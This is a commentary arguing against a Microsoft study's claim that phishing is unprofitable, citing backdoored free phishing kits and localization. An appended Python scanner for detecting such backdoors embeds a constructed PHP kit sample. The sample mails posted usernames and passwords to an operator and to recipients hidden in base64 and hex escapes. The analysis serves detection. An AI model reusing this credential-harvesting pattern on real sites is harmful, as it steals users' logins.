Microsoft study debunks phishing profitability
Citing Garrett Hardin's 1968 article "The Tragedy of the Commons", the researchers argue that because so many phishers work the same scam scene, each of them earns less than they otherwise could. Moreover, according to the research, the enormous volume of phishing emails is in fact an indication of phishing's failure rather than its success. Naturally, there are many more factors to consider, in particular whether phishers are in fact profit-maximizing machines or whether they are willing to sacrifice potential profit for the sake of their own operational security. Is it all about making big money, or simply about breaking even?
"However, as we will show, the economics of phishing are far far worse than this. Rather than sharing a fixed pool of dollars phishing is subject to the tragedy of the commons; i.e. the pool of dollars shrinks as a result of the efforts of the phishers. A community (all phishers) share a finite resource (the pool of phishable dollars) that has limited ability to regenerate (dollars once phished are not available to other phishers). The tragedy of the commons is that the rational course of action for each individual (phisher) leads to over-exploitation and degradation of the resource (the phishable dollars)."
Using the Tragedy of the Commons analogy here makes it sound as if the disposable income a phisher can eventually reach through each phished person is universally the same. Logically, that is not the case: a single phished person can prove a more profitable catch than a hundred others, and the pool of potentially phishable people keeps growing as more people go online, so the "commons" is neither uniform nor fixed in size.
Moreover, phishers, who are perhaps not so mindful of economic models, are constantly looking for ways to achieve better efficiency, lower costs, and eat other phishers' lunch by scamming their fellow colleagues. For instance, related research published in August 2008 found evidence that phishers are backdooring phishing pages and distributing them for free so that other phishers do the scam for them, with every stolen credential quietly copied back to the kit's author. The same backdooring process, even though not yet properly analyzed in a study, continues at a more advanced and far more profitable level: backdoored web malware exploitation kits and botnet command and control interfaces. Therefore, of a hundred actively participating phishers, eighty could easily be phishing for the other twenty.
Go through related phishing tactics covered previously:
- DIY phishing kits introducing new features
- Phishers apply quality assurance, start validating credit card numbers
- Lack of phishing attacks data sharing puts $300M at stake annually
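As an added example (not code from the original post or from the study it discusses), this is the kind of check a recipient of a "free" kit, or an analyst who recovers one from a compromised host, would run before trusting it: a Python scanner over a constructed, hypothetical kit source that pulls every recipient address reaching PHP's mail(), including addresses hidden in base64_decode() or hex-escaped strings, and reports the ones that appear only in obfuscated form as the kit author's backdoor. The kit, its comments, and all addresses below are constructed for illustration.

```python
"""Scan a phishing-kit PHP source for a backdoored second recipient.

A kit author who gives the kit away keeps a copy of every stolen credential
by adding a second mail() call whose address is obfuscated (base64, hex
escapes) so the kit's new operator does not notice it. This scanner pulls
every e-mail address reachable by mail(), whether written in clear or hidden
inside base64_decode() / hex-escaped strings, and reports addresses that
only ever appear in obfuscated form.
"""
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# base64_decode('...') with a literal argument.
B64_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# A double-quoted string made entirely of \xNN escapes.
HEX_RE = re.compile(r'"((?:\\x[0-9A-Fa-f]{2})+)"')
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")

# Constructed (hypothetical) kit: one operator address in clear, two hidden.
KIT_SOURCE = r'''<?php
// Operator configuration: the address the kit "sells" to its new user.
$to = "operator@example.com";
$subject = "New login";
$body = "User: " . $_POST['user'] . " Pass: " . $_POST['pass'] . " IP: " . $_SERVER['REMOTE_ADDR'];
mail($to, $subject, $body);

// "Anti-spam filter" (really the kit author's backdoor): the same
// credentials go to a second address hidden in base64.
$h = base64_decode('YXV0aG9yQGV4YW1wbGUubmV0');
mail($h, $subject, $body);

// A second backdoor using hex escapes inside a double-quoted string.
$x = "\x62\x61\x63\x6b\x75\x70\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x6f\x72\x67";
mail($x, $subject, $body);

header("Location: https://bank.example/login");
?>'''


def decode_hex_string(s):
    """Turn a run of \\xNN escapes into the text they encode."""
    pairs = re.findall(r"\\x([0-9A-Fa-f]{2})", s)
    return bytes(int(h, 16) for h in pairs).decode("latin-1")


def addresses_in_clear(src):
    """Addresses a casual reader of the kit would see."""
    return set(EMAIL_RE.findall(src))


def addresses_obfuscated(src):
    """Addresses recovered by decoding base64 and hex-escaped literals."""
    found = set()
    for blob in B64_RE.findall(src):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64; ignore
        found.update(EMAIL_RE.findall(decoded))
    for hexstr in HEX_RE.findall(src):
        found.update(EMAIL_RE.findall(decode_hex_string(hexstr)))
    return found


def analyze_kit(src):
    """Report recipients in clear, recipients hidden by obfuscation, and a verdict."""
    clear = addresses_in_clear(src)
    hidden = addresses_obfuscated(src) - clear
    return {
        "mail_calls": len(MAIL_CALL_RE.findall(src)),
        "clear_recipients": sorted(clear),
        "hidden_recipients": sorted(hidden),
        # A recipient that exists only in obfuscated form has no legitimate
        # reason to be hidden from the kit's operator: treat it as a backdoor.
        "backdoored": bool(hidden),
    }


if __name__ == "__main__":
    report = analyze_kit(KIT_SOURCE)
    print(f"mail() calls: {report['mail_calls']}")
    print(f"recipients in clear: {report['clear_recipients']}")
    print(f"hidden recipients:   {report['hidden_recipients']}")
    print("verdict: BACKDOORED" if report["backdoored"] else "verdict: no hidden recipient found")
```

The scanner only resolves literal base64 and hex strings; real kits also build addresses with chr() chains, str_rot13(), or eval() over packed code, so a hidden recipient that this script does not find is not proof that the kit is clean. Running the kit in a sandbox with outbound SMTP captured is the more reliable check.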
There are even more variables to consider, such as internal competition among phishers. A phisher who has just sent a million phishing emails impersonating a leading German bank to a million Chinese users, perhaps without knowing that the spam database he is using belongs to Chinese citizens, should not expect the same outcome as a fellow phisher who has taken basic localization and targeting steps into account. With the localization of cybercrime under way as of early 2008, outsourcing the translation of a particular phishing campaign or email opens up an entirely new space for phishers to target potential victims more effectively. The bottom line is that the second phisher has a higher chance of success even though both are attempting to phish the same Chinese users, since he would be impersonating a local bank and his phishing creatives would be written in the victims' native language.
This is where efficiency and scalability come into play, a situation much like that of spam. As long as even a small number of recipients out of a million phishing emails become victims, the phisher breaks even and therefore keeps expanding the number of emails sent. This should not be taken as a failure of phishing in general; rather, it is a campaign optimization practice that attempts to achieve better results by targeting a larger population, which is why sheer volume by itself says little about how well any individual phisher is doing.
There is another issue to consider: how much money is a phisher actually looking to make out of his campaigns, and is there in fact a maximum or a minimum to his ambitions? Even once access to someone's account is obtained, is the phisher actually able to withdraw the money, or is he going to make money by selling access to the phished account to someone who can, thus monetizing the account data instead of using it? Evidence gathered on this practice clearly indicates that novice phishers may in fact never obtain any of the money they have access to, but still make money by selling that access to those who can cash it out.
Phishers may not be making the money they used to a couple of years ago, but then again phishing has long stopped being an exclusive cybercrime practice. It has turned into a cybercrime practice "in between", with phishers breaking even given the lowering costs and entry barriers into the phishing space in general. And as long as they break even, millions of phishing emails will continue circulating, again "in between" the rest of their malicious activities.